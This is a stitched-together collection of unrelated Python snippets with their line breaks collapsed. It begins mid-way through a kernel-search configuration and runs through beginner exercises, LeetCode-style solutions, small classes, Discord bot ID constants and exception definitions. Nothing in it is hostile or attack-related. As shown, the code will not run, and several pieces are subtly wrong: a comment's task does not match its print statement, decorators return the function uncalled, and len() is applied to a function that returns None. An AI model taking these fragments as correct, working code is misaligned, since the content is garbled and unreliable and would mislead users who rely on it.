sf=1.55627318007), ff.SqExpKernel(dimension=3, lengthscale=4.90387746338, sf=0.141619151618), ff.SqExpKernel(dimension=6, lengthscale=6.07802289484, sf=-0.657774296862), ff.SqExpKernel(dimension=7, lengthscale=-4.17834528345, sf=1.54315353644)])])', # Starting kernel lik='ff.LikGauss(sf=-np.Inf)', # Starting likelihood score='bic', stopping_criteria=['no_improvement'], improvement_tolerance=0.01, search_operators=[('A', ('+', 'A', 'B'), {'A': 'kernel', 'B': 'base'}), ('A', ('*', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}), ('A', ('*-const', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}), ('A', 'B', {'A': 'kernel', 'B': 'base'}), ('A', ('None',), {'A': 'kernel'})])
N, S = map(int, input().split()) ans = 0 for i in range(1, N+1): for j in range(1, N+1): if i + j <= S: ans += 1 print(ans)
class Model(object): __db = None __cache_engine = None @classmethod def set_db(cls, db): cls.__db = db\ @classmethod def get_db(cls): return cls.__db @property def db(self): return self.__db @classmethod def set_cache_engine(cls, cache_engine): cls.__cache_engine = cache_engine @property def cache(self): return self.__cache_engine
# Using third argument in range lst = [x for x in range(2,21,2)] print(lst) # Without using third argument in range lst1 = [x for x in range(1,21) if(x%2 == 0)] print(lst1)
def find_median_sorted_arrays(array_A, array_B): m, n = len(array_A), len(array_B) # 如果数组A的长度大于等于数组B,则交换数组 if m > n: array_A, array_B, m, n = array_B, array_A, n, m if n == 0: raise ValueError start, end, half_len = 0, m, (m + n + 1) // 2 while start <= end: i = (start + end) // 2 j = half_len - i if i < m and array_B[j-1] > array_A[i]: # i偏小了,需要右移 start = i + 1 elif i > 0 and array_A[i - 1] > array_B[j]: # i偏大了,需要左移 end = i - 1 else: # i刚好合适,或i已达到数组边界 if i == 0: max_of_left = array_B[j-1] elif j == 0: max_of_left = array_A[i-1] else: max_of_left = max(array_A[i-1], array_B[j-1]) if (m + n) % 2 == 1: # 如果大数组的长度是奇数,中位数就是左半部分的最大值 return max_of_left if i == m: min_of_right = array_B[j] elif j == n: min_of_right = array_A[i] else: min_of_right = min(array_A[i], array_B[j]) # 如果大数组的长度是偶数,取左侧最大值和右侧最小值的平均 return (max_of_left + min_of_right) / 2.0 my_array_A = list([3, 5, 6, 7, 8, 12, 20]) my_array_B = list([1, 10, 17, 18]) print(find_median_sorted_arrays(my_array_A, my_array_B))
v = input('Digite o seu sexo (F/M): ').upper().strip()[0] while v not in 'MmFf': v = str(input('Resposta inválida. Tente novamente (F/M): ')).strip().upper()[0] print('Sexo {} registrado com Sucesso.'.format(v))
COLUMNS = [ 'tipo_registro', 'nro_pv', 'nro_rv', 'dt_rv', 'bancos', 'nro_parcela', 'vl_parcela_bruto', 'vl_desconto_sobre_parcela', 'vl_parcela_liquida', 'dt_credito', 'livre' ]
"""Calculate the Hamming Distance between two DNA Strands. Given two strings each representing a DNA strand, return the Hamming Distance between them. """ def distance(strand_a, strand_b): """Calculates the Hamming distance between two strands. Args: strand_a: A string representing a DNA strand. strand_b: A string representing a DNA strand. Returns: An integer representing the Hamming Distance between the two strands. """ if len(strand_a) != len(strand_b): raise ValueError("left and right strands must be of equal length") hamming_distance = 0 for idx, elem in enumerate(strand_a): if elem != strand_b[idx]: hamming_distance += 1 return hamming_distance
class Pista(object):# modelar una pista musical (cancion) def __init__(self, nombre, favorita, duracion, artista): self.nombre = nombre #Srting self.favorita = favorita #tipo boolean self.duracion = duracion #tipo float self.artista = artista #String #Getters and Setters def set_name_song(self, nombre): self.nombre = nombre def set_favorita(self, favorita): self.favorita = favorita def set_duracion(self, duracion): self.duracion = duracion def set_artista(self, artista): self.artista = artista def get_name_song(self): return self.nombre def get_favorita(self): return self.favorita def get_duracion(self): return self.duracion def get_artista(self): return self.artista #Funciones extra def hit_of_the_month(): return "The hit of the month is:\n'Jump' from the legendary group called 'Van Hallen', check it out now!" def song_of_the_week(): return "The song of the week is:\n'Safaera' from Bad Bunny, (I know, the people are stupid) anyway, play it now!" class ReproductorMusical(Pista): #modelar un objeto "disco" de la vida real def __init__(self, disk_list, disk_price, disk_name): self.disk_list = disk_list self.disk_price = disk_price self.disk_name = disk_name #Una función que nos permita agregar pistas a una instancia de la clase #después de usar add_track, pasar como parámetro llenando_pistas() (hacerle unpacking) #y el otro parámetro será la lista para que sean los 5 elementos que recibe add_track() def add_track(name, fav, duration, artist, list) -> list: list.append(Pista(name, fav, duration, artist)) return list # *********AQUÍ SE ENCUENTRAN LOS DECORADORES********* def page_artist(function): def wrapper(list): for elem in list: print(f"La página del artista {elem.artista} es: www.{elem.artista}.com.mx") return function return wrapper def charging_lyrics(function): def wrapper(list): print(f"Las letras de la canción {list[0].nombre} se están cargando...") return function return wrapper #Función decorada que nos devuelva todas las pistas marcadas como favoritas en el reproductor musical #Además de incluir la página web del artista @page_artist def return_favs(list) -> list: favoritas_list = [] for pista_obj in list: if (pista_obj.favorita == True): favoritas_list.append(pista_obj.get_name_song) return favoritas_list #Finalmente, agrega una última función (decorada) que nos devuelva todas las pistas por orden de duracion #Y también carga las lyrics de su respectiva pista @charging_lyrics def pistas_por_orden(list) ->list: return sorted(list, key=lambda Pista : Pista.duracion) if __name__ == "__main__": #Acá se guardan todas las pistas lista = [] #Creamos dinamicamente las pistas def llenando_pistas(): name = input('Nombre de la canción: ') fav = input("escribe t si es True, otra cosa si es False: ") if fav.lower() == 't': fav = True else: fav = False duration = float(input('Duracion: ')) artist = input('Nombre del artista: ') return name, fav, duration, artist ReproductorMusical.add_track(*llenando_pistas(),lista) ReproductorMusical.add_track(*llenando_pistas(),lista) print(ReproductorMusical.return_favs(lista)) print(ReproductorMusical.pistas_por_orden(lista))
# 1. Write a line of Python code that displays the sum of 468 + 751 print(0.7 * (220-33) +0.3 * 55) print(0.8 * (225-33) +0.35 * 55)
class CyCyError(Exception): """ Base class for non-runtime internal errors. """ def rstr(self): name = self.__class__.__name__ return "%s\n%s\n\n%s" % (name, "-" * len(name), self.__str__())
# https://leetcode.com/problems/insert-into-a-binary-search-tree/ # Definition for a binary tree node. # class TreeNode: # def __init__(self, val=0, left=None, right=None): # self.val = val # self.left = left # self.right = right class Solution: def insertIntoBST(self, root: TreeNode, val: int) -> TreeNode: # I'll walk through my thinking w/r/t this problem prior to coding. # First I need to traverse the BST to find the appropriate insertion location # to do so I will start with the root node and begin by checking whether there's a val # if no val, it's trivial: Just insert the new val and return the root node. # If val < TreeNode.val, then we'd go left (recursively) # If val > TreeNode.val, then we'd go right (recursively) # Eventually we arrive at a node with either one, two, or no children # So, let's enumerate all of the cases: # Consider, concretely, the following example: Parent.val = 10. Parent.left.val = 5. Parent.right.val = 15. # The value given could be less than five. If so, we'd overwrite one of the None child nodes of 5 with a new tree node # containing the value given. # The value given could be greater than five but less than ten. Same story as above w/r/t overwriting the child None # node (but this time, obviously, overwrite the Right child None node). # The value given could be greater than 10 but less than 15: Overwrite the Left None child node of 15. # The value given could be greater than 15: Overwrite the Right None child node of 15. # Arriving at a leaf node with no non-None children is the simpliest case: Just overwrite one of the None child nodes # as described above # Suppose we arrive at a node with one None child and one non-None child. That treatment is just a mix of the above two # cases, depending upon what the given val is and where the None child resides. In any case, we'll be overwriting a # None child. def insert(root, node): if root is None: root = node else: if root.val < node.val: if root.right is None: root.right = node else: insert(root.right, node) else: if root.left is None: root.left = node else: insert(root.left, node) node = TreeNode(val) insert(root, node) if root is None: root = TreeNode(val) return root
n = input("Digite algo: ") print("É um número?", n.isnumeric()) print("É uma letra/palavra?", n.isalpha()) print("É algo vazio?", n.isspace()) print("É um alpha númerico?", n.isalnum()) print("Se for letra, está em maíusculo?", n.isupper()) print("Se for letra, está em minusculo?", n.islower()) print("Se for letra, está em modelo capitalizado?", n.istitle())
#1 f = open('Grade2.txt', "a") Score = open('Score1.txt',"r") g=0 ll = Score.readline() while ll != "": l = ll.split(",") #print(l) eee = l[4][0:2] e = int(eee) if g <= e: g=e else: g=g ll = Score.readline() print(ll) f.write(str(g)) f.close() Score.close()
def multiplyTwoList(head1, head2): # Code here a="" b="" temp1=head1 while temp1!=None: a+=str(temp1.data) temp1=temp1.next # print a temp2=head2 while temp2!=None: b+=str(temp2.data) temp2=temp2.next # print b return (int(a)*int(b))%MOD
""" Insertion sort A simple sorting algorithm that builds the final sorted array (or list) one item at a time. It is much less efficient on large lists than more advanced algorithms such as quicksort, heapsort, or merge sort. Best Average Worst n n2 n2 """
SERVER_ID = 835880446041784350 WELCOME_CHANNEL_ID = 842083947566989392 NOTIFICATIONS_CHANNEL_ID = 848976411082620978 STAFF_ROLE_ID = 842043939380264980 REACTIONS_MESSAGE_ID = 940644226004303902 REACTION_ROLES = { "⬆️": 848971201946320916, # Server updates "🥵": 848971574077292604, # Bot updates "📰": 848971915518541885, # Bot news }
""" local enclosing local enclosing local ,global,builtin (legb)""" name = 'rajat puri'# global def greet(): name = 'rajat' #local def hello(): print("hello"+name) #enclosing local hello() greet() len(hello()) #builtin
''' Created on Sep 22, 2012 @author: Jason ''' class DatasetError(Exception): ''' I will use this class to raise dataset-related exceptions. Common errors: Empty datasets provided, datasets with wrong number of features, datasets lacking some feature or labels, etc Used the ready-baked template on the Python tutorial: http://docs.python.org/tutorial/errors.html (section 8.5) ''' def __init__(self, description): ''' Constructor ''' self.description = description def __str__(self): return repr(self.description) class LogicalError(Exception): ''' Used for more logic-oriented errors, such as providing parameters that make no sense for the application at hand. ''' def __init__(self, description): ''' Constructor ''' self.description = description def __str__(self): return repr(self.description)
class App(object): @property def ScreenWidth(self): return 1024 @property def ScreenHeight(self): return 768